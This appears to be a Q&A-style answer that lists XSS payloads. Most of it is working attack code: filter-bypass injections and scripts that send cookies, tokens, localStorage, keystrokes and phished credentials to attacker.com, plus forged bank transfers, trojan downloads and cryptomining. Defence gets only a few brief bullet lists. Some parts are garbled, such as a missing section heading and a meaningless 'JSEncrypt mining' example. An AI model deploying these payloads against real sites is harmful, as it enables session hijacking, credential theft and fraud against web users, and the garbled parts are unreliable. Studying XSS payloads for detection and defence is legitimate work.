What are common XSS payloads? How to identify and protect against malicious XSS payloads?

Answer

XSS Payload (attack payload) is the malicious code fragment used by attackers to execute XSS attacks. Understanding common XSS payloads is crucial for detecting and protecting against XSS attacks. XSS payloads can be divided into multiple types, each with its specific attack scenarios and bypass techniques.

Basic XSS Payloads

1. Script Tag Injection

Most Basic Payload:

html
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>

Variants:

html
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/.source)</script>
<script>alert`XSS`</script>

2. Image Tag Injection

onerror Event:

html
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>

Variants:

html
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1) />
<img src=x onerror=alert(1)//>

3. SVG Tag Injection

onload Event:

html
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">

Variants:

html
<svg onload="alert(1)">
<svg onload='alert(1)'>
<svg onload=alert(1)>

Advanced XSS Payloads

1. Event Handler Injection

Common Events:

html
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onblur=alert(1)>

<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus>
<input onchange=alert(1) autofocus>

<select onfocus=alert(1) autofocus>
<select onblur=alert(1) autofocus>
<select onchange=alert(1) autofocus>

<textarea onfocus=alert(1) autofocus>
<textarea onblur=alert(1) autofocus>
<textarea onchange=alert(1) autofocus>

<details open ontoggle=alert(1)>
<details open onmouseover=alert(1)>
<details open onclick=alert(1)>

2. iframe Injection

javascript: Protocol:

html
<iframe src="javascript:alert(1)"></iframe>
<iframe src='javascript:alert(1)'></iframe>
<iframe src=javascript:alert(1)></iframe>

data: Protocol:

html
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

3. form Injection

formaction Attribute:

html
<form><button formaction=javascript:alert(1)>Click</button></form>
<form><input type=submit formaction=javascript:alert(1) value=Click></form>

formtarget Attribute:

html
<form action="javascript:alert(1)"><input type=submit value=Click></form>
<form action="data:text/html,<script>alert(1)</script>"><input type=submit value=Click></form>

Filter Bypass Payloads

1. Case Bypass

Variants:

html
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<Img src=x oNeRrOr=alert(1)>

2. Encoding Bypass

HTML Entity Encoding:

html
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;

URL Encoding:

html
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

JavaScript Encoding:

html
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<script>\x61\x6c\x65\x72\x74(1)</script>

3. Comment Bypass

Variants:

html
<!--><script>alert(1)</script>-->
<!----><script>alert(1)</script><!-->
<!--><img src=x onerror=alert(1)>-->

4. Space Bypass

Variants:

html
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<script>alert(1)//>

5. Quote Bypass

Variants:

html
<script>alert(1)</script>
<script>alert`1`</script>
<script>alert(/1/)</script>
<script>alert(String.fromCharCode(49))</script>

Direct Send:

html
<script>
  const stolenCookie = document.cookie;
  fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));
</script>

Using Image Tag:

html
<img src="http://attacker.com/steal?cookie=123" onerror="this.src='http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)">

Using XMLHttpRequest:

html
<script>
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
  xhr.send();
</script>

Using WebSocket:

html
<script>
  const ws = new WebSocket('ws://attacker.com/steal');
  ws.onopen = function() {
    ws.send(document.cookie);
  };
</script>

Session Hijacking Payloads

1. Session ID Theft

LocalStorage Theft:

html
<script>
  const localStorageData = JSON.stringify(localStorage);
  fetch('http://attacker.com/steal?localStorage=' + encodeURIComponent(localStorageData));
</script>

SessionStorage Theft:

html
<script>
  const sessionStorageData = JSON.stringify(sessionStorage);
  fetch('http://attacker.com/steal?sessionStorage=' + encodeURIComponent(sessionStorageData));
</script>

2. Token Theft

JWT Token Theft:

html
<script>
  const token = localStorage.getItem('token');
  fetch('http://attacker.com/steal?token=' + encodeURIComponent(token));
</script>

Phishing Attack Payloads

Inject Fake Form:

html
<script>
  const fakeForm = `
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
      <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
        <h3>Session expired, please login again</h3>
        <input type="text" id="username" placeholder="Username">
        <input type="password" id="password" placeholder="Password">
        <button onclick="stealCredentials()">Login</button>
      </div>
    </div>
  `;
  document.body.innerHTML += fakeForm;
  
  function stealCredentials() {
    const username = document.getElementById('username').value;
    const password = document.getElementById('password').value;
    fetch('http://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify({ username, password })
    });
  }
</script>

2. Redirect Attack

Malicious Redirect:

html
<script>
  window.location = 'http://phishing.com/login?ref=' + encodeURIComponent(document.location.href);
</script>

Using meta tag:

html
<meta http-equiv="refresh" content="0;url=http://phishing.com/login">

Keylogging Payloads

1. Basic Keylogging

Record All Keystrokes:

html
<script>
  let keylog = '';
  document.addEventListener('keydown', function(e) {
    keylog += e.key;
    if (keylog.length > 100) {
      fetch('http://attacker.com/keylog', {
        method: 'POST',
        body: JSON.stringify({ keylog })
      });
      keylog = '';
    }
  });
</script>

2. Advanced Keylogging

Record Context:

html
<script>
  let keylog = [];
  document.addEventListener('keydown', function(e) {
    keylog.push({
      key: e.key,
      timestamp: Date.now(),
      url: window.location.href,
      element: e.target.tagName
    });
    
    if (keylog.length > 50) {
      fetch('http://attacker.com/keylog', {
        method: 'POST',
        body: JSON.stringify({ keylog })
      });
      keylog = [];
    }
  });
</script>

Data Tampering Payloads

1. Modify Page Content

Modify Text Content:

html
<script>
  document.getElementById('bank-balance').textContent = '999999.99';
  document.getElementById('transaction-history').innerHTML = '<p>No transaction records</p>';
</script>

2. Modify Links

Modify All Links:

html
<script>
  const links = document.querySelectorAll('a');
  links.forEach(link => {
    link.href = 'http://phishing.com/login?redirect=' + encodeURIComponent(link.href);
  });
</script>

CSRF Assisting Payloads

1. Auto-send Request

Send GET Request:

html
<script>
  fetch('http://bank.com/transfer?to=attacker&amount=10000', {
    credentials: 'include'
  });
</script>

Send POST Request:

html
<script>
  fetch('http://bank.com/transfer', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'to=attacker&amount=10000',
    credentials: 'include'
  });
</script>

2. Steal CSRF Token

Steal Token in meta tag:

html
<script>
  const csrfToken = document.querySelector('meta[name="csrf-token"]').content;
  fetch('http://attacker.com/steal?token=' + encodeURIComponent(csrfToken));
</script>

Malware Distribution Payloads

1. Download Malicious File

Auto Download:

html
<script>
  const link = document.createElement('a');
  link.href = 'http://malicious.com/trojan.exe';
  link.download = 'update.exe';
  link.click();
</script>

2. Induce Download

Show Fake Update Prompt:

html
<script>
  const updateMessage = `
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
      <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
        <h3>New version found, click to download update</h3>
        <a href="http://malicious.com/update.exe" download>Download Update</a>
      </div>
    </div>
  `;
  document.body.innerHTML += updateMessage;
</script>

Cryptojacking Payloads

1. Using Coinhive

Basic Mining:

html
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.User('site-key');
  miner.start();
</script>

2. Using JSEncrypt

Encrypted Mining:

html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jsencrypt/3.0.0/jsencrypt.min.js"></script>
<script>
  var crypt = new JSEncrypt();
  // Execute encrypted mining
</script>

Detection and Protection

1. Detect Payloads

Common Detection Methods:

Search for <script> tags
Search for javascript: protocol
Search for onerror, onload and other event handlers
Search for eval(), new Function() and other dangerous functions
Use regular expressions to match malicious patterns

2. Protect Against Payloads

Protection Measures:

Encode all user input
Use Content Security Policy
Set HttpOnly Cookie
Use safe DOM APIs
Implement input validation and filtering

Summary

XSS Payloads are tools used by attackers to execute XSS attacks. Understanding common XSS payloads is crucial for detecting and protecting against XSS attacks. Common XSS payloads include:

Basic Payloads: Script tags, image tags, SVG tags
Advanced Payloads: Event handlers, iframes, forms
Filter Bypass Payloads: Case, encoding, comments, spaces, quotes
Cookie Theft Payloads: Direct send, use Image tag
Session Hijacking Payloads: LocalStorage, SessionStorage, Token theft
Phishing Attack Payloads: Fake login forms, redirect attacks
Keylogging Payloads: Record keystrokes, record context
Data Tampering Payloads: Modify page content, modify links
CSRF Assisting Payloads: Auto-send requests, steal CSRF Token
Malware Distribution Payloads: Download malicious files, induce downloads
Cryptojacking Payloads: Use Coinhive, JSEncrypt

By understanding these payloads, developers can better detect and protect against XSS attacks.

Answer

Basic XSS Payloads

1. Script Tag Injection

2. Image Tag Injection

3. SVG Tag Injection

Advanced XSS Payloads

1. Event Handler Injection

2. iframe Injection

3. form Injection

Filter Bypass Payloads

1. Case Bypass

2. Encoding Bypass

3. Comment Bypass

4. Space Bypass

5. Quote Bypass

Cookie Theft Payloads

1. Basic Cookie Theft

2. Advanced Cookie Theft

Session Hijacking Payloads

1. Session ID Theft

2. Token Theft

Phishing Attack Payloads

1. Fake Login Form

2. Redirect Attack

Keylogging Payloads

1. Basic Keylogging

2. Advanced Keylogging

Data Tampering Payloads

1. Modify Page Content

2. Modify Links

CSRF Assisting Payloads

1. Auto-send Request

2. Steal CSRF Token

Malware Distribution Payloads

1. Download Malicious File

2. Induce Download

Cryptojacking Payloads

1. Using Coinhive

2. Using JSEncrypt

Detection and Protection

1. Detect Payloads

2. Protect Against Payloads

Summary